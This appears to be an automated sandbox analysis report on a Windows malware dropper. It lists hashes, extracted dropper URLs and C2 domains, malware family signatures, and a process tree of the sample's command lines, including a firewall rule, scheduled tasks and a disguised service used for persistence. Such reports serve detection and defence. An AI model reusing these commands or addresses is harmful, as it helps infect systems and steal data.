Analysis

  • max time kernel
    153s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    12-03-2022 04:04

General

  • Target

    9f23e527d4140ae6d975b905f06e9838cb376500b1ae5a4dc8bc87909969399f.exe

  • Size

    8.0MB

  • MD5

    f59e849af46dc9bbbee758bcd2174d9e

  • SHA1

    3dd0aca43cb3683778dfc7a7e0e8cbf384de9393

  • SHA256

    9f23e527d4140ae6d975b905f06e9838cb376500b1ae5a4dc8bc87909969399f

  • SHA512

    8ac06790974234f70688602e6d63acd9d494f64bf83c85c0279eebcc6cd40e7359952591a3ff740002aef09ef80da71517df0647ac2d655385eb1887f7d403a4

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

50.7

Botnet

937

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • OnlyLogger Payload 1 IoCs
  • Vidar Stealer 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 36 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 64 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9f23e527d4140ae6d975b905f06e9838cb376500b1ae5a4dc8bc87909969399f.exe
    "C:\Users\Admin\AppData\Local\Temp\9f23e527d4140ae6d975b905f06e9838cb376500b1ae5a4dc8bc87909969399f.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3312
    • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
      "C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3584
    • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
      "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
      2⤵
      • Executes dropped EXE
      • Checks whether UAC is enabled
      PID:2784
    • C:\Users\Admin\AppData\Local\Temp\Folder.exe
      "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3496
      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
        3⤵
        • Executes dropped EXE
        PID:4748
    • C:\Users\Admin\AppData\Local\Temp\Info.exe
      "C:\Users\Admin\AppData\Local\Temp\Info.exe"
      2⤵
      • Executes dropped EXE
      PID:4896
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 368
        3⤵
        • Program crash
        PID:688
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 368
        3⤵
        • Program crash
        PID:4144
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 380
        3⤵
        • Program crash
        PID:4488
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 652
        3⤵
        • Program crash
        PID:2540
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 652
        3⤵
        • Program crash
        PID:4644
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 652
        3⤵
        • Program crash
        PID:4044
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 728
        3⤵
        • Program crash
        PID:4220
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 736
        3⤵
        • Program crash
        PID:1864
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 748
        3⤵
        • Program crash
        PID:1732
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 748
        3⤵
        • Program crash
        PID:548
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 724
        3⤵
        • Program crash
        PID:1500
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 652
        3⤵
        • Program crash
        PID:1472
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 780
        3⤵
        • Program crash
        PID:836
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 720
        3⤵
        • Program crash
        PID:1128
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 616
        3⤵
        • Program crash
        PID:3956
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 872
        3⤵
        • Program crash
        PID:1620
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 744
        3⤵
        • Program crash
        PID:4688
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 708
        3⤵
        • Program crash
        PID:1644
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 796
        3⤵
        • Program crash
        PID:4276
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 696
        3⤵
        • Program crash
        PID:4584
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 772
        3⤵
        • Program crash
        PID:4424
      • C:\Users\Admin\AppData\Local\Temp\Info.exe
        "C:\Users\Admin\AppData\Local\Temp\Info.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:4616
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 332
          4⤵
          • Program crash
          PID:4440
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 356
          4⤵
          • Program crash
          PID:3428
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 376
          4⤵
          • Program crash
          PID:4192
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 632
          4⤵
          • Program crash
          PID:404
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 632
          4⤵
          • Program crash
          PID:4060
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 632
          4⤵
          • Program crash
          PID:208
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 700
          4⤵
          • Program crash
          PID:1228
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 708
          4⤵
          • Program crash
          PID:388
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 728
          4⤵
          • Program crash
          PID:3852
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 716
          4⤵
          • Program crash
          PID:688
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 784
          4⤵
          • Program crash
          PID:4144
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 648
          4⤵
          • Program crash
          PID:3400
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 792
          4⤵
          • Program crash
          PID:4272
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 852
          4⤵
          • Program crash
          PID:4072
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 920
          4⤵
          • Program crash
          PID:4252
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1368
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            5⤵
              PID:2352
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 836
            4⤵
            • Program crash
            PID:1852
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe /94-94
            4⤵
            • Executes dropped EXE
            PID:1384
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 368
              5⤵
              • Program crash
              PID:4196
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 372
              5⤵
              • Program crash
              PID:2744
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 368
              5⤵
              • Program crash
              PID:2260
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 488
              5⤵
              • Program crash
              PID:1732
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 712
              5⤵
              • Program crash
              PID:2980
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 712
              5⤵
              • Program crash
              PID:4472
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 712
              5⤵
              • Program crash
              PID:4192
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 744
              5⤵
              • Program crash
              PID:4884
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 760
              5⤵
              • Program crash
              PID:412
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 632
              5⤵
              • Program crash
              PID:3336
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 820
              5⤵
              • Program crash
              PID:3800
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 868
              5⤵
              • Program crash
              PID:1628
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 868
              5⤵
              • Program crash
              PID:204
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              5⤵
              • Creates scheduled task(s)
              PID:4500
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 904
              5⤵
              • Program crash
              PID:3592
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 904
              5⤵
              • Program crash
              PID:1888
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 904
              5⤵
              • Program crash
              PID:824
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 992
              5⤵
              • Program crash
              PID:2544
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 976
              5⤵
              • Program crash
              PID:4648
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 1016
              5⤵
              • Program crash
              PID:4608
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 960
              5⤵
              • Program crash
              PID:1316
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 992
              5⤵
              • Program crash
              PID:4780
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 952
              5⤵
              • Program crash
              PID:2268
            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              5⤵
              • Executes dropped EXE
              PID:216
            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              5⤵
              • Executes dropped EXE
              PID:1368
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 1000
              5⤵
                PID:5840
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 1156
                5⤵
                  PID:2392
          • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
            "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
            2⤵
            • Executes dropped EXE
            PID:4604
          • C:\Users\Admin\AppData\Local\Temp\Files.exe
            "C:\Users\Admin\AppData\Local\Temp\Files.exe"
            2⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:4552
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              3⤵
              • Executes dropped EXE
              PID:2484
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              3⤵
              • Executes dropped EXE
              PID:2984
          • C:\Users\Admin\AppData\Local\Temp\pub2.exe
            "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
            2⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:4560
          • C:\Users\Admin\AppData\Local\Temp\File.exe
            "C:\Users\Admin\AppData\Local\Temp\File.exe"
            2⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1676
            • C:\Users\Admin\Pictures\Adobe Films\j_kpEzk2ge4e6SXLrnYgegju.exe
              "C:\Users\Admin\Pictures\Adobe Films\j_kpEzk2ge4e6SXLrnYgegju.exe"
              3⤵
              • Executes dropped EXE
              PID:4432
            • C:\Users\Admin\Pictures\Adobe Films\CWIZde9tA16qa9Qo94JtWhEd.exe
              "C:\Users\Admin\Pictures\Adobe Films\CWIZde9tA16qa9Qo94JtWhEd.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:3948
              • C:\Users\Admin\Documents\GHK5dNCkeS_GqLTHjTOTrhB0.exe
                "C:\Users\Admin\Documents\GHK5dNCkeS_GqLTHjTOTrhB0.exe"
                4⤵
                  PID:5488
                  • C:\Users\Admin\Pictures\Adobe Films\kHrTwA8HjbVvg18uP6b1cqKG.exe
                    "C:\Users\Admin\Pictures\Adobe Films\kHrTwA8HjbVvg18uP6b1cqKG.exe"
                    5⤵
                      PID:4180
                    • C:\Users\Admin\Pictures\Adobe Films\rm1ODoUEzYB6wQQatfrBHmFR.exe
                      "C:\Users\Admin\Pictures\Adobe Films\rm1ODoUEzYB6wQQatfrBHmFR.exe"
                      5⤵
                        PID:5972
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 624
                          6⤵
                            PID:3512
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 764
                            6⤵
                              PID:4256
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 860
                              6⤵
                                PID:6080
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 1272
                                6⤵
                                  PID:5532
                              • C:\Users\Admin\Pictures\Adobe Films\pOkVpf1On8DcvZkshvbA7PKx.exe
                                "C:\Users\Admin\Pictures\Adobe Films\pOkVpf1On8DcvZkshvbA7PKx.exe"
                                5⤵
                                  PID:6028
                                  • C:\Windows\SysWOW64\control.exe
                                    "C:\Windows\System32\control.exe" .\a6U_WGm.9B
                                    6⤵
                                      PID:3520
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                        7⤵
                                          PID:5800
                                          • C:\Windows\system32\RunDll32.exe
                                            C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                            8⤵
                                              PID:3336
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B
                                                9⤵
                                                  PID:5424
                                        • C:\Users\Admin\Pictures\Adobe Films\3kLscs1a18Rt7wAWEdh2n3_j.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\3kLscs1a18Rt7wAWEdh2n3_j.exe"
                                          5⤵
                                            PID:4060
                                            • C:\Users\Admin\AppData\Local\Temp\7zS20DA.tmp\Install.exe
                                              .\Install.exe
                                              6⤵
                                                PID:5784
                                                • C:\Users\Admin\AppData\Local\Temp\7zS6083.tmp\Install.exe
                                                  .\Install.exe /S /site_id "525403"
                                                  7⤵
                                                    PID:4756
                                              • C:\Users\Admin\Pictures\Adobe Films\zrYBvTZgSqkAdeweP8QMKAjU.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\zrYBvTZgSqkAdeweP8QMKAjU.exe"
                                                5⤵
                                                  PID:5672
                                                • C:\Users\Admin\Pictures\Adobe Films\seEq9sYpScWGCgMH6dGtURLi.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\seEq9sYpScWGCgMH6dGtURLi.exe"
                                                  5⤵
                                                    PID:5760
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                      6⤵
                                                        PID:4284
                                                    • C:\Users\Admin\Pictures\Adobe Films\l_9kHulBxSMGrX4xVretejXU.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\l_9kHulBxSMGrX4xVretejXU.exe"
                                                      5⤵
                                                        PID:3412
                                                        • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
                                                          6⤵
                                                            PID:2792
                                                            • C:\Users\Admin\AppData\Local\Temp\37JME.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\37JME.exe"
                                                              7⤵
                                                                PID:5444
                                                              • C:\Users\Admin\AppData\Local\Temp\K43LB.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\K43LB.exe"
                                                                7⤵
                                                                  PID:3804
                                                                • C:\Users\Admin\AppData\Local\Temp\K43LB.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\K43LB.exe"
                                                                  7⤵
                                                                    PID:4716
                                                                  • C:\Users\Admin\AppData\Local\Temp\GDG3I.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\GDG3I.exe"
                                                                    7⤵
                                                                      PID:5780
                                                                    • C:\Users\Admin\AppData\Local\Temp\9A02M.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\9A02M.exe"
                                                                      7⤵
                                                                        PID:5864
                                                                    • C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
                                                                      6⤵
                                                                        PID:4540
                                                                      • C:\Users\Admin\AppData\Local\Temp\po50.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\po50.exe"
                                                                        6⤵
                                                                          PID:1676
                                                                        • C:\Users\Admin\AppData\Local\Temp\zhangyy.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\zhangyy.exe"
                                                                          6⤵
                                                                            PID:3740
                                                                            • C:\Users\Admin\AppData\Local\Temp\zhangyy.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\zhangyy.exe" -h
                                                                              7⤵
                                                                                PID:5448
                                                                            • C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
                                                                              6⤵
                                                                                PID:3928
                                                                              • C:\Users\Admin\AppData\Local\Temp\pub1.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\pub1.exe"
                                                                                6⤵
                                                                                  PID:3872
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\31a3g2t7.173.bat""
                                                                                    7⤵
                                                                                      PID:3452
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe"
                                                                                    6⤵
                                                                                      PID:4156
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:5568
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:5496
                                                                              • C:\Users\Admin\Pictures\Adobe Films\kBX7EA8oPvcY_EncoLDcFKH8.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\kBX7EA8oPvcY_EncoLDcFKH8.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3652
                                                                              • C:\Users\Admin\Pictures\Adobe Films\x2V0hGTz_sb1ZDp9fuvvrf3L.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\x2V0hGTz_sb1ZDp9fuvvrf3L.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Checks computer location settings
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3556
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                  4⤵
                                                                                    PID:4496
                                                                                • C:\Users\Admin\Pictures\Adobe Films\RR49ziPgmRFD2wBaMvLwnmqD.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\RR49ziPgmRFD2wBaMvLwnmqD.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:3352
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1288
                                                                                    4⤵
                                                                                      PID:5332
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\d0MiNmRtsXLeIHlrnYOHB7Hh.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\d0MiNmRtsXLeIHlrnYOHB7Hh.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4072
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 460
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:4172
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 468
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:1236
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\DZx5P5AuNMf1sMbVI4gWxCxr.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\DZx5P5AuNMf1sMbVI4gWxCxr.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4196
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qxlpzjol\
                                                                                      4⤵
                                                                                        PID:5456
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vqfbvxvq.exe" C:\Windows\SysWOW64\qxlpzjol\
                                                                                        4⤵
                                                                                          PID:5668
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          "C:\Windows\System32\sc.exe" create qxlpzjol binPath= "C:\Windows\SysWOW64\qxlpzjol\vqfbvxvq.exe /d\"C:\Users\Admin\Pictures\Adobe Films\DZx5P5AuNMf1sMbVI4gWxCxr.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                          4⤵
                                                                                            PID:5860
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            "C:\Windows\System32\sc.exe" description qxlpzjol "wifi internet conection"
